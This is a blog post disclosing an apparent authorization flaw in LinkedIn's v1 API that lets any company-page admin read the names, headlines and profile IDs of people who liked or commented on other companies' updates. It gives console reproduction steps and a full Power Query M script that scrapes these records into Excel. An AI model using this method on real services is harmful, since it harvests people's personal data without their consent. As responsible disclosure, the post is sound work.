Inspired by the big news that Microsoft is about to acquire LinkedIn, and given my past role as a privacy and security advocate on the Microsoft Excel team, I thought it was important to share a privacy bug in the LinkedIn API and a possible violation of section 2.13 of LinkedIn's Privacy Policy.
According to section 2.13 of the LinkedIn Privacy Policy: “Companies and other entities can create pages on our Services. If you follow one of these pages, non-identifiable information about you will be provided to the page’s administrators.” Well, today I will show you how any person (not only administrators) can automatically extract such data, and potentially “harvest” user profiles based on their engagement on any company page.
I found this bug while working on this blog post. I am sharing it with you today, after a recent response from LinkedIn stating that the issue is expected behavior and not a bug.
So LinkedIn and I can agree to disagree. I still think that the issue I am about to share is a bug, and IMHO a serious one, as it allows hackers to use the LinkedIn API to extract data about LinkedIn users who liked or commented on ANY company’s specific update, without that company’s permission.
For example, here is a screenshot of an Excel workbook that takes advantage of this bug to extract 100 names from LinkedIn, along with each user's professional headline and LinkedIn object ID, which can lead to additional personal data such as location.
These 100 users liked a specific Microsoft status update on LinkedIn (they are 100 out of a total of 2,769 users who liked the update below). The status update was selected arbitrarily; you can extract the same information from any other company update on LinkedIn.
Now, as you can imagine, I don’t have administrator access to Microsoft’s company page, so it seems “unfair” that I can read this data, or even worse, that the company’s competitors or hackers could abuse it.
You may argue that this data should be public, since it is visible to anyone who browses company pages on LinkedIn. Below, however, I will show evidence that LinkedIn intended to block this data from users who are not company page administrators.
As for company administrators, it does make sense to let them extract such data to monitor engagement and learn more about their audience. But right now, because of this bug, anyone can create a fake company on LinkedIn and “harvest” users by their likes and comments on other companies’ updates.
Now let’s drill down to the bug itself.
The following API call can be used with any legitimate or fake company ID on any company’s specific update:
https://api.linkedin.com/v1/companies/[any company ID that you administer; it can be a fake company]/updates/key=UPDATE-c1337-[the status ID of any company update you wish to retrieve]?format=json
As mentioned above, the response to this API call includes 100 records of personal names, professional headlines, picture URLs and object IDs of users who liked or commented on the specific status update. With the LinkedIn object IDs, you can extract additional information from LinkedIn, like user location.
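To make the URL pattern above concrete, here is a small Power Query M sketch that assembles the request URL from the two IDs. The function name BuildUpdateUrl is hypothetical (it is not part of any LinkedIn or Power Query API), and both IDs are passed as text, on the assumption that 19-digit status IDs are safer as text than as M's double-precision numbers. The example values are the DataChant company ID and the Coca-Cola status ID that appear in the steps of this post.

```powerquery
// Sketch only: BuildUpdateUrl is a hypothetical helper, not a LinkedIn or Power Query function.
let
    // Compose the v1 company-update URL from a company ID you administer
    // and the status (activity) ID of the update to query.
    BuildUpdateUrl = (companyId as text, statusId as text) as text =>
        "https://api.linkedin.com/v1/companies/" & companyId
            & "/updates/key=UPDATE-c1337-" & statusId
            & "?format=json",
    // Example values from this post: DataChant company ID, Coca-Cola status ID
    Result = BuildUpdateUrl("10376695", "6139457523029196800")
in
    Result
```

With these example values, the query evaluates to https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-6139457523029196800?format=json.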
Here are easy steps to reproduce the bug:
- Make sure you are an administrator of a company page in LinkedIn.
- Open the LinkedIn API Console.
- Sign in with your LinkedIn profile by selecting OAuth 2 in the Authentication drop-down menu.
- Click on List all companies that the member is an administrator… (highlighted by the first red rectangle below).
- Click the Send button (highlighted by the second red rectangle below).
- Copy your company ID (highlighted by the third red rectangle below).
- Click the Get a specific company update link (highlighted below), and then click the Send button.
- You will notice an HTTP/1.1 403 Forbidden error in the Response pane (see screenshot below). This is the expected behavior, because you are not the administrator of the company page whose ID is 1337 (the console uses company ID 1337 by default).
Note: To me, the error message in the following screenshot suggests that LinkedIn originally intended to block this API call when the caller is not the company’s administrator. The message clearly states: “Member does not have permission to get company”.
- Now here is the bug: in the Request URL box, replace company ID 1337 with the company ID you retrieved in the previous steps, and click the Send button.
For example: In the original URL we have company ID 1337: https://api.linkedin.com/v1/companies/1337/updates/key=UPDATE-c1337-5986518397255454720?format=json
In the modified URL, I used the DataChant company ID: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-5986518397255454720?format=json
- In the Response pane you will see the engagement data for a specific post whose ID is 5986518397255454720 (This post ID was auto-populated by the API console).
- To extract data on other companies, find the relevant company on LinkedIn. Let’s use Coca-Cola as an example.
- Open the Coca-Cola company page in your browser.
- Select a specific update, right-click its Share link, and open the link in a new tab.
- In your browser, switch to the tab you opened in the previous step and copy the numerical value of activityId (marked by the red rectangle in the screenshot below).
- Back in the API Console, paste the activityId number you copied in the previous step into the URL in the Request URL box, replacing the status ID that follows UPDATE-c1337-.
For example: The URL before the last step was: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-5986518397255454720?format=json
The new URL after this step will be: https://api.linkedin.com/v1/companies/10376695/updates/key=UPDATE-c1337-6139457523029196800?format=json
- In the API Console click the Send button.
- Now you can see in the Response pane data on people who liked or commented on a specific update on Coca-Cola’s company page.
Conclusions:
As described above, a programmer or an advanced Excel user (such as a reader of my blog) can write a tool that automatically extracts data about LinkedIn users based on their engagement on targeted company pages.
The steps I demonstrated above can easily be automated and exploited by hackers, who could build large datasets of user profiles based on specific engagements with specific companies and sell this data to cybercrime organizations. In addition, companies could take advantage of this information, at the expense of users’ privacy and trust in LinkedIn, and create automated tools that harvest data on their competitors’ audiences.
Finally, here is the Power Query M expression that can be used to extract the data to Excel or Power BI.
After you paste the code into the Advanced Editor, don’t forget to change yourCompanyId to your LinkedIn company ID (Find above how to get that ID).
When you refresh the query, you will need to enter a LinkedIn access token in the credentials dialog in Excel or Power BI. To obtain a token, you can use the LinkedIn API Console, as described in my earlier blog post.
```m
let
    // Change this value to your own company's ID.
    // IDs are kept as text because the & operator only concatenates text values.
    yourCompanyId = "10376695",
    // This is a Coca-Cola status update.
    // You can replace it with the status ID of any update you wish to retrieve, by ANY company.
    statusId = "6139457523029196800",
    // format=json is supplied through the Query option below, so it is not repeated here
    url = "https://api.linkedin.com/v1/companies/" & yourCompanyId
        & "/updates/key=UPDATE-c1337-" & statusId,
    // ApiKeyName makes Excel/Power BI prompt for the access token and send it
    // as the oauth2_access_token query parameter
    Source = Json.Document(
        Web.Contents(url, [ApiKeyName = "oauth2_access_token", Query = [format = "json"]])),
    likes = Source[likes],
    values = likes[values],
    // One row per like record
    #"Converted to Table" = Table.FromList(
        values, Splitter.SplitByNothing(), null, null, ExtraValues.Error),
    #"Expanded Column1" = Table.ExpandRecordColumn(
        #"Converted to Table", "Column1",
        {"person", "timestamp"}, {"Column1.person", "Column1.timestamp"}),
    // Expand the person record into name, headline, ID and picture columns
    #"Expanded Column1.person" = Table.ExpandRecordColumn(
        #"Expanded Column1", "Column1.person",
        {"firstName", "headline", "id", "lastName", "pictureUrl"},
        {"Column1.person.firstName", "Column1.person.headline", "Column1.person.id",
         "Column1.person.lastName", "Column1.person.pictureUrl"}),
    #"Reordered Columns" = Table.ReorderColumns(
        #"Expanded Column1.person",
        {"Column1.person.firstName", "Column1.person.lastName", "Column1.person.headline",
         "Column1.person.id", "Column1.person.pictureUrl", "Column1.timestamp"}),
    #"Renamed Columns" = Table.RenameColumns(
        #"Reordered Columns",
        {{"Column1.person.firstName", "First Name"}, {"Column1.person.lastName", "Last Name"},
         {"Column1.person.headline", "Headline"}, {"Column1.person.id", "Object ID"},
         {"Column1.person.pictureUrl", "Picture URL"}}),
    #"Removed Columns" = Table.RemoveColumns(#"Renamed Columns", {"Column1.timestamp"})
in
    #"Removed Columns"
```
Disclaimer: Because the LinkedIn Security team received this issue by email and responded that this behavior is not a bug, I am sharing it with you to raise awareness of user privacy, and I encourage you to use the information above for learning purposes only. The author of this article takes no responsibility for any outcome or misuse of this information.